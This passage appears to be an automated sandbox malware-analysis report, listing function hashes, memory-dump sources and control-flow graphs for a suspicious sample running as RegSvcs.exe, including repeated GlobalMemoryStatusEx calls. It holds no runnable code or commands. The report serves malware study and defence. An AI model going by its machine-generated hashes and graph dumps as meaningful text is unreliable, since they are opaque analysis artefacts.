                                                            • Instruction ID: 8eeab4b60a707416b6c4ed526adaa09899ad9d2753bd44f043f9d59f93e80186
                                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction Fuzzy Hash: 8A11CDB6504280CFCF06CF44D5C0B56BF61FB84224F2482A9D8490A656C33AE866CBA2
                                                            Function 0116D4BF Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction ID: 549eaede7f20961b7f5bbe418b1ae8eb357d4f95cce8d48d4298b3c522aa6b86
                                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                            • Instruction Fuzzy Hash: 4E11AF76504280CFCF16CF54E5C4B16BF71FB84318F24C6A9D8490B656C33AD466CBA2
                                                            Function 02A2D1CF Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235554572.0000000002A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A2D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_2a2d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: cfec4eb0a94fb76ac7dcd40377aeed21d550764e4fd2ea7bbc743237efaff54f
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: A811BBB5504680DFCB05CF14C5C0B15FBA1FB84218F24C6A9D8494B2A6C33AD40ACB61
                                                            Function 0116D759 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a51d0ec9d6a4507cd77a34a906a9f8dfa044e4754d1b9053f8e549bbaf169a4a
                                                            • Instruction ID: 98df8a349cdcd7a8717ad870c142c713a6456a48c54a19f22e5ac4b4c6c3d264
                                                            • Opcode Fuzzy Hash: a51d0ec9d6a4507cd77a34a906a9f8dfa044e4754d1b9053f8e549bbaf169a4a
                                                            • Instruction Fuzzy Hash: BE01F771604784DAEB184AA9ED80B26BF9CDF41228F18841AEE484A286C7BE9440C673
                                                            Function 0116D758 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.2235005686.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_116d000_EhzaIxEFbjyd.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a8b64c1fcd4c09f5d50195037f1906c14b0b114beacd45a684ee057dc96546c
                                                            • Instruction ID: 9a79d5c021dd1100ad4fbd0fef0f6c2e44e62b4ccbf7154073232226716c0b91
                                                            • Opcode Fuzzy Hash: 5a8b64c1fcd4c09f5d50195037f1906c14b0b114beacd45a684ee057dc96546c
                                                            • Instruction Fuzzy Hash: C7F0C8715043849EEB148E09DC84B62FFACEF40628F14C45AEE484A286C3796840CB71

                                                            Execution Graph

                                                            Execution Coverage:9.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:27
                                                            Total number of Limit Nodes:2
                                                            execution_graph 28123 1207d90 28125 1207da6 28123->28125 28124 1207f12 28125->28124 28126 587f2af 3 API calls 28125->28126 28126->28124 28097 12a29a8 28099 12a29c4 28097->28099 28098 12a2ad4 28099->28098 28100 587da88 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28099->28100 28101 587da98 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28099->28101 28100->28099 28101->28099 28102 1207ea8 28103 1207eb2 28102->28103 28105 1207ecc 28103->28105 28109 587da88 28103->28109 28114 587da98 28103->28114 28104 1207f12 28105->28104 28119 587f2af 28105->28119 28110 587daad 28109->28110 28111 587dcc2 28110->28111 28112 587dcd9 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28110->28112 28113 587dce8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28110->28113 28111->28105 28112->28110 28113->28110 28116 587daad 28114->28116 28115 587dcc2 28115->28105 28116->28115 28117 587dcd9 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28116->28117 28118 587dce8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28116->28118 28117->28116 28118->28116 28120 587f2ba 28119->28120 28121 587da98 3 API calls 28120->28121 28122 587f2c1 28121->28122 28122->28104

                                                            Executed Functions

                                                            Function 0120AA28 Relevance: 2.8, Instructions: 2788COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b9153b6965f0672e8cecebca21ce0488f6d3414f4b012ad423ce763f7444527
                                                            • Instruction ID: 8006113f6576a60409a221071f3baeedcb5e2d1a8c22ce5745d37edf6bad7cf7
                                                            • Opcode Fuzzy Hash: 5b9153b6965f0672e8cecebca21ce0488f6d3414f4b012ad423ce763f7444527
                                                            • Instruction Fuzzy Hash: FB53F931C10B1A8ADB51EFA8C8805A9F7B1FF99300F15D79AE45877121FB70AAD5CB81
                                                            Function 012041B8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 584 12041b8-120421e 586 1204220-120422b 584->586 587 1204268-120426a 584->587 586->587 589 120422d-1204239 586->589 588 120426c-1204285 587->588 596 12042d1-12042d3 588->596 597 1204287-1204293 588->597 590 120423b-1204245 589->590 591 120425c-1204266 589->591 592 1204247 590->592 593 1204249-1204258 590->593 591->588 592->593 593->593 595 120425a 593->595 595->591 598 12042d5-120432d 596->598 597->596 599 1204295-12042a1 597->599 608 1204377-1204379 598->608 609 120432f-120433a 598->609 600 12042a3-12042ad 599->600 601 12042c4-12042cf 599->601 603 12042b1-12042c0 600->603 604 12042af 600->604 601->598 603->603 605 12042c2 603->605 604->603 605->601 610 120437b-1204393 608->610 609->608 611 120433c-1204348 609->611 617 1204395-12043a0 610->617 618 12043dd-12043df 610->618 612 120434a-1204354 611->612 613 120436b-1204375 611->613 614 1204356 612->614 615 1204358-1204367 612->615 613->610 614->615 615->615 619 1204369 615->619 617->618 620 12043a2-12043ae 617->620 621 12043e1-1204432 618->621 619->613 622 12043b0-12043ba 620->622 623 12043d1-12043db 620->623 629 1204438-1204446 621->629 624 12043bc 622->624 625 12043be-12043cd 622->625 623->621 624->625 625->625 627 12043cf 625->627 627->623 630 1204448-120444e 629->630 631 120444f-12044af 629->631 630->631 638 12044b1-12044b5 631->638 639 12044bf-12044c3 631->639 638->639 640 12044b7 638->640 641 12044d3-12044d7 639->641 642 12044c5-12044c9 639->642 640->639 644 12044e7-12044eb 641->644 645 12044d9-12044dd 641->645 642->641 643 12044cb 642->643 643->641 647 12044fb-12044ff 644->647 648 12044ed-12044f1 644->648 645->644 646 12044df-12044e2 call 1200ab8 645->646 646->644 651 1204501-1204505 647->651 652 120450f-1204513 647->652 648->647 650 12044f3-12044f6 call 1200ab8 648->650 650->647 651->652 654 1204507-120450a call 1200ab8 651->654 655 1204523-1204527 652->655 656 1204515-1204519 652->656 654->652 658 1204537 655->658 659 1204529-120452d 655->659 656->655 657 120451b 656->657 657->655 662 1204538 658->662 659->658 661 120452f 659->661 661->658 662->662
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: ddbda6e2936b94984e082d3b7c0715b5ae046ce62f15c49093f7e3c227c56d83
                                                            • Instruction ID: c3b8e6862754a8c96253af010f8623a172d6ce69e5590654350d7daefada845b
                                                            • Opcode Fuzzy Hash: ddbda6e2936b94984e082d3b7c0715b5ae046ce62f15c49093f7e3c227c56d83
                                                            • Instruction Fuzzy Hash: 9BB17F70E1024A8FDF11DFA9C8857EDBBF2BF88714F14C229DA15A7295EB749841CB81
                                                            Function 01203E70 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 743 1203e70-1203ed6 745 1203f20-1203f22 743->745 746 1203ed8-1203ee3 743->746 748 1203f24-1203f7c 745->748 746->745 747 1203ee5-1203ef1 746->747 749 1203ef3-1203efd 747->749 750 1203f14-1203f1e 747->750 757 1203fc6-1203fc8 748->757 758 1203f7e-1203f89 748->758 751 1203f01-1203f10 749->751 752 1203eff 749->752 750->748 751->751 754 1203f12 751->754 752->751 754->750 760 1203fca-1203fe2 757->760 758->757 759 1203f8b-1203f97 758->759 761 1203f99-1203fa3 759->761 762 1203fba-1203fc4 759->762 767 1203fe4-1203fef 760->767 768 120402c-120402e 760->768 763 1203fa5 761->763 764 1203fa7-1203fb6 761->764 762->760 763->764 764->764 766 1203fb8 764->766 766->762 767->768 769 1203ff1-1203ffd 767->769 770 1204030-120407e 768->770 771 1204020-120402a 769->771 772 1203fff-1204009 769->772 778 1204084-1204092 770->778 771->770 774 120400b 772->774 775 120400d-120401c 772->775 774->775 775->775 776 120401e 775->776 776->771 779 1204094-120409a 778->779 780 120409b-12040fb 778->780 779->780 787 120410b-120410f 780->787 788 12040fd-1204101 780->788 790 1204111-1204115 787->790 791 120411f-1204123 787->791 788->787 789 1204103 788->789 789->787 790->791 792 1204117-120411a call 1200ab8 790->792 793 1204133-1204137 791->793 794 1204125-1204129 791->794 792->791 797 1204147-120414b 793->797 798 1204139-120413d 793->798 794->793 796 120412b-120412e call 1200ab8 794->796 796->793 799 120415b-120415f 797->799 800 120414d-1204151 797->800 798->797 802 120413f-1204142 call 1200ab8 798->802 804 1204161-1204165 799->804 805 120416f 799->805 800->799 803 1204153 800->803 802->797 803->799 804->805 807 1204167 804->807 808 1204170 805->808 807->805 808->808
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 887c6aeeb969999ff7a6f746d757295c62a533cb95ef1f4bc3d71972203ffa6c
                                                            • Instruction ID: 101335964a6a0fd946d995d71b65833daaa2fbfd773e948011c6d54322f78274
                                                            • Opcode Fuzzy Hash: 887c6aeeb969999ff7a6f746d757295c62a533cb95ef1f4bc3d71972203ffa6c
                                                            • Instruction Fuzzy Hash: B5919F70E1024ACFDF15DFA9C9857EDBBF2BF88314F148229E604A7295EB749845CB81
                                                            Function 01204A88 Relevance: .3, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50bc0a3b484e9e7c2abaa8498645e59bedabf41b9bb6331bb3331978b5b3dd43
                                                            • Instruction ID: a536ba568f8a5e8c59917181a470a384a3770c809751a8489818dc1ea6211f4d
                                                            • Opcode Fuzzy Hash: 50bc0a3b484e9e7c2abaa8498645e59bedabf41b9bb6331bb3331978b5b3dd43
                                                            • Instruction Fuzzy Hash: 7BB19E70E1064A8FDB11DFA9C8917ADBBF2BF88314F14C229DA15E7295EB749841CB81
                                                            Function 01204800 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 459 1204800-120488c 462 12048d6-12048d8 459->462 463 120488e-1204899 459->463 465 12048da-12048f2 462->465 463->462 464 120489b-12048a7 463->464 466 12048a9-12048b3 464->466 467 12048ca-12048d4 464->467 472 12048f4-12048ff 465->472 473 120493c-120493e 465->473 468 12048b5 466->468 469 12048b7-12048c6 466->469 467->465 468->469 469->469 471 12048c8 469->471 471->467 472->473 475 1204901-120490d 472->475 474 1204940-1204999 473->474 484 12049a2-12049c2 474->484 485 120499b-12049a1 474->485 476 1204930-120493a 475->476 477 120490f-1204919 475->477 476->474 478 120491b 477->478 479 120491d-120492c 477->479 478->479 479->479 481 120492e 479->481 481->476 489 12049cc-12049ff 484->489 485->484 492 1204a01-1204a05 489->492 493 1204a0f-1204a13 489->493 492->493 494 1204a07-1204a0a call 1200ab8 492->494 495 1204a23-1204a27 493->495 496 1204a15-1204a19 493->496 494->493 497 1204a37-1204a3b 495->497 498 1204a29-1204a2d 495->498 496->495 500 1204a1b-1204a1e call 1200ab8 496->500 502 1204a4b 497->502 503 1204a3d-1204a41 497->503 498->497 501 1204a2f 498->501 500->495 501->497 506 1204a4c 502->506 503->502 505 1204a43 503->505 505->502 506->506
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: 01cb1ed43295fa7a1fc465e523103d8f521777ef12c068920983d2ca0f85b79d
                                                            • Instruction ID: e248b593183c91c4f3281e25746431d907ea9f3a93b06e8dbfdc6f828c23efd6
                                                            • Opcode Fuzzy Hash: 01cb1ed43295fa7a1fc465e523103d8f521777ef12c068920983d2ca0f85b79d
                                                            • Instruction Fuzzy Hash: 44716E70E1028D8FDB15DFA9C88079EBBF2BF88714F14C229E614A7295EB749841CF95
                                                            Function 012047F4 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 507 12047f4-120488c 510 12048d6-12048d8 507->510 511 120488e-1204899 507->511 513 12048da-12048f2 510->513 511->510 512 120489b-12048a7 511->512 514 12048a9-12048b3 512->514 515 12048ca-12048d4 512->515 520 12048f4-12048ff 513->520 521 120493c-120493e 513->521 516 12048b5 514->516 517 12048b7-12048c6 514->517 515->513 516->517 517->517 519 12048c8 517->519 519->515 520->521 523 1204901-120490d 520->523 522 1204940-1204952 521->522 530 1204959-1204985 522->530 524 1204930-120493a 523->524 525 120490f-1204919 523->525 524->522 526 120491b 525->526 527 120491d-120492c 525->527 526->527 527->527 529 120492e 527->529 529->524 531 120498b-1204999 530->531 532 12049a2-12049b0 531->532 533 120499b-12049a1 531->533 536 12049b8-12049c2 532->536 533->532 537 12049cc-12049ff 536->537 540 1204a01-1204a05 537->540 541 1204a0f-1204a13 537->541 540->541 542 1204a07-1204a0a call 1200ab8 540->542 543 1204a23-1204a27 541->543 544 1204a15-1204a19 541->544 542->541 545 1204a37-1204a3b 543->545 546 1204a29-1204a2d 543->546 544->543 548 1204a1b-1204a1e call 1200ab8 544->548 550 1204a4b 545->550 551 1204a3d-1204a41 545->551 546->545 549 1204a2f 546->549 548->543 549->545 554 1204a4c 550->554 551->550 553 1204a43 551->553 553->550 554->554
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n$\V[n
                                                            • API String ID: 0-3705941238
                                                            • Opcode ID: 76aa3c13572444b94da8940f8df820a1c47c3e08774a919b704f5b591044d50e
                                                            • Instruction ID: cfd785d87bce205d4bfe08c2da851e49665da29f208cd6d973ae59f8be3aa9dc
                                                            • Opcode Fuzzy Hash: 76aa3c13572444b94da8940f8df820a1c47c3e08774a919b704f5b591044d50e
                                                            • Instruction Fuzzy Hash: 5B717D70D1028E8FDB11DFA9C88179DBBF1BF88714F14C229E604A7295EB749841CF95
                                                            Function 0587EA10 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 555 587ea10-587ea1b 556 587ea45-587ea64 call 587cefc 555->556 557 587ea1d-587ea44 call 587cef0 555->557 563 587ea66-587ea69 556->563 564 587ea6a-587eac9 556->564 569 587eacf-587eb5c GlobalMemoryStatusEx 564->569 570 587eacb-587eace 564->570 573 587eb65-587eb8d 569->573 574 587eb5e-587eb64 569->574 574->573
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4615459034.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_5870000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c39d6b5045ccf82e797d5741bc3038519ba66613bed0c5cea589fd35044a073
                                                            • Instruction ID: c9aaad51215e3af50751dbb47444898c48ec8438b648f2d46e99bb953f27b8b7
                                                            • Opcode Fuzzy Hash: 3c39d6b5045ccf82e797d5741bc3038519ba66613bed0c5cea589fd35044a073
                                                            • Instruction Fuzzy Hash: F5412272E043898FCB04CFB9D8042EEBBF4BF89210F14856AD808E7251DB749845CB91
                                                            Function 0587CEFC Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 577 587cefc-587eb5c GlobalMemoryStatusEx 580 587eb65-587eb8d 577->580 581 587eb5e-587eb64 577->581 581->580
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0587EA62), ref: 0587EB4F
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4615459034.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_5870000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 623c04f0a775659581f405e952d35e8bd232323a7450e02533e9b6447bb12302
                                                            • Instruction ID: 0d3c4d22fad671f1cb92c74db8e3989bfd9cef427de1f5674aea61be789995ff
                                                            • Opcode Fuzzy Hash: 623c04f0a775659581f405e952d35e8bd232323a7450e02533e9b6447bb12302
                                                            • Instruction Fuzzy Hash: B61136B1C046599BDB10CFAAC44479EFBF4BF48220F10816AE918B7240D378A914CFA5
                                                            Function 012041AC Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 663 12041ac-120421e 666 1204220-120422b 663->666 667 1204268-120426a 663->667 666->667 669 120422d-1204239 666->669 668 120426c-1204285 667->668 676 12042d1-12042d3 668->676 677 1204287-1204293 668->677 670 120423b-1204245 669->670 671 120425c-1204266 669->671 672 1204247 670->672 673 1204249-1204258 670->673 671->668 672->673 673->673 675 120425a 673->675 675->671 678 12042d5-120432d 676->678 677->676 679 1204295-12042a1 677->679 688 1204377-1204379 678->688 689 120432f-120433a 678->689 680 12042a3-12042ad 679->680 681 12042c4-12042cf 679->681 683 12042b1-12042c0 680->683 684 12042af 680->684 681->678 683->683 685 12042c2 683->685 684->683 685->681 690 120437b-1204393 688->690 689->688 691 120433c-1204348 689->691 697 1204395-12043a0 690->697 698 12043dd-12043df 690->698 692 120434a-1204354 691->692 693 120436b-1204375 691->693 694 1204356 692->694 695 1204358-1204367 692->695 693->690 694->695 695->695 699 1204369 695->699 697->698 700 12043a2-12043ae 697->700 701 12043e1-12043f3 698->701 699->693 702 12043b0-12043ba 700->702 703 12043d1-12043db 700->703 708 12043fa-1204432 701->708 704 12043bc 702->704 705 12043be-12043cd 702->705 703->701 704->705 705->705 707 12043cf 705->707 707->703 709 1204438-1204446 708->709 710 1204448-120444e 709->710 711 120444f-12044af 709->711 710->711 718 12044b1-12044b5 711->718 719 12044bf-12044c3 711->719 718->719 720 12044b7 718->720 721 12044d3-12044d7 719->721 722 12044c5-12044c9 719->722 720->719 724 12044e7-12044eb 721->724 725 12044d9-12044dd 721->725 722->721 723 12044cb 722->723 723->721 727 12044fb-12044ff 724->727 728 12044ed-12044f1 724->728 725->724 726 12044df-12044e2 call 1200ab8 725->726 726->724 731 1204501-1204505 727->731 732 120450f-1204513 727->732 728->727 730 12044f3-12044f6 call 1200ab8 728->730 730->727 731->732 734 1204507-120450a call 1200ab8 731->734 735 1204523-1204527 732->735 736 1204515-1204519 732->736 734->732 738 1204537 735->738 739 1204529-120452d 735->739 736->735 737 120451b 736->737 737->735 742 1204538 738->742 739->738 741 120452f 739->741 741->738 742->742
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 2bded5884e352d47d73418d99ad27766938e6f74a3eb432fe9e3abe81ea4133f
                                                            • Instruction ID: e7955a2dc1b0f10f3a4f2036df2765657818e86c7f0ee9e1c08427b979d602b2
                                                            • Opcode Fuzzy Hash: 2bded5884e352d47d73418d99ad27766938e6f74a3eb432fe9e3abe81ea4133f
                                                            • Instruction Fuzzy Hash: 86B16E70E1024ACFDB11DFA9C88579DBBF1FF88714F14C229DA14A7295EB749845CB81
                                                            Function 01203E66 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 809 1203e66-1203ed6 811 1203f20-1203f22 809->811 812 1203ed8-1203ee3 809->812 814 1203f24-1203f7c 811->814 812->811 813 1203ee5-1203ef1 812->813 815 1203ef3-1203efd 813->815 816 1203f14-1203f1e 813->816 823 1203fc6-1203fc8 814->823 824 1203f7e-1203f89 814->824 817 1203f01-1203f10 815->817 818 1203eff 815->818 816->814 817->817 820 1203f12 817->820 818->817 820->816 826 1203fca-1203fe2 823->826 824->823 825 1203f8b-1203f97 824->825 827 1203f99-1203fa3 825->827 828 1203fba-1203fc4 825->828 833 1203fe4-1203fef 826->833 834 120402c-120402e 826->834 829 1203fa5 827->829 830 1203fa7-1203fb6 827->830 828->826 829->830 830->830 832 1203fb8 830->832 832->828 833->834 835 1203ff1-1203ffd 833->835 836 1204030-1204042 834->836 837 1204020-120402a 835->837 838 1203fff-1204009 835->838 843 1204049-120407e 836->843 837->836 840 120400b 838->840 841 120400d-120401c 838->841 840->841 841->841 842 120401e 841->842 842->837 844 1204084-1204092 843->844 845 1204094-120409a 844->845 846 120409b-12040fb 844->846 845->846 853 120410b-120410f 846->853 854 12040fd-1204101 846->854 856 1204111-1204115 853->856 857 120411f-1204123 853->857 854->853 855 1204103 854->855 855->853 856->857 858 1204117-120411a call 1200ab8 856->858 859 1204133-1204137 857->859 860 1204125-1204129 857->860 858->857 863 1204147-120414b 859->863 864 1204139-120413d 859->864 860->859 862 120412b-120412e call 1200ab8 860->862 862->859 865 120415b-120415f 863->865 866 120414d-1204151 863->866 864->863 868 120413f-1204142 call 1200ab8 864->868 870 1204161-1204165 865->870 871 120416f 865->871 866->865 869 1204153 866->869 868->863 869->865 870->871 873 1204167 870->873 874 1204170 871->874 873->871 874->874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V[n
                                                            • API String ID: 0-1005319620
                                                            • Opcode ID: 8fdeedc57b5679b61e04c690fd5617a2de1c59e4975fb3683f7d882ea0804c77
                                                            • Instruction ID: 017da0e72c885c6c85286f73ca4a779c5f88583a0c5d7041724058d47c8ef8a8
                                                            • Opcode Fuzzy Hash: 8fdeedc57b5679b61e04c690fd5617a2de1c59e4975fb3683f7d882ea0804c77
                                                            • Instruction Fuzzy Hash: EC918D70E2024ACFDF15DFA9C9857DDBBF2BF88314F148229E604A7295EB749845CB81
                                                            Function 01200848 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 875 1200848-120084c 876 120084e-1200851 875->876 877 1200853 876->877 878 120085e-1200861 876->878 905 1200853 call 120147a 877->905 906 1200853 call 120136f 877->906 879 1200863 878->879 880 120086e-1200871 878->880 886 1200869 879->886 882 1200882-1200885 880->882 883 1200873 880->883 881 1200859 881->878 884 1200909-120090b 882->884 885 120088b-120089b 882->885 889 120087d 883->889 887 1200912-1200915 884->887 888 120090d 884->888 892 12008cd-12008d5 885->892 893 120089d-12008cb 885->893 886->880 887->876 891 120091b-120091d 887->891 888->887 889->882 894 12008d7-12008d9 892->894 895 12008db-12008dd 892->895 893->892 897 12008e3-12008e5 894->897 895->897 898 12008e7-12008ed 897->898 899 12008fd-1200904 897->899 902 12008f1-12008f3 898->902 903 12008ef 898->903 899->884 902->899 903->899 905->881 906->881
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Co
                                                            • API String ID: 0-3798529171
                                                            • Opcode ID: c413d7bb8854c187ee4c30e8a00369b64a4bd46e2827f74a411f218abf69327e
                                                            • Instruction ID: 3ca3039d1d710e1bb471435a57f7db8198bab2933a1e17a61d2df660fae8a704
                                                            • Opcode Fuzzy Hash: c413d7bb8854c187ee4c30e8a00369b64a4bd46e2827f74a411f218abf69327e
                                                            • Instruction Fuzzy Hash: 94118231B2020A8BFF175B7DC80476A3655FB45694F204A39E206CF2C7DA61CD818BC5
                                                            Function 01200838 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 922 1200838-120084c 924 120084e-1200851 922->924 925 1200853 924->925 926 120085e-1200861 924->926 953 1200853 call 120147a 925->953 954 1200853 call 120136f 925->954 927 1200863 926->927 928 120086e-1200871 926->928 934 1200869 927->934 930 1200882-1200885 928->930 931 1200873 928->931 929 1200859 929->926 932 1200909-120090b 930->932 933 120088b-120089b 930->933 937 120087d 931->937 935 1200912-1200915 932->935 936 120090d 932->936 940 12008cd-12008d5 933->940 941 120089d-12008cb 933->941 934->928 935->924 939 120091b-120091d 935->939 936->935 937->930 942 12008d7-12008d9 940->942 943 12008db-12008dd 940->943 941->940 945 12008e3-12008e5 942->945 943->945 946 12008e7-12008ed 945->946 947 12008fd-1200904 945->947 950 12008f1-12008f3 946->950 951 12008ef 946->951 947->932 950->947 951->947 953->929 954->929
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
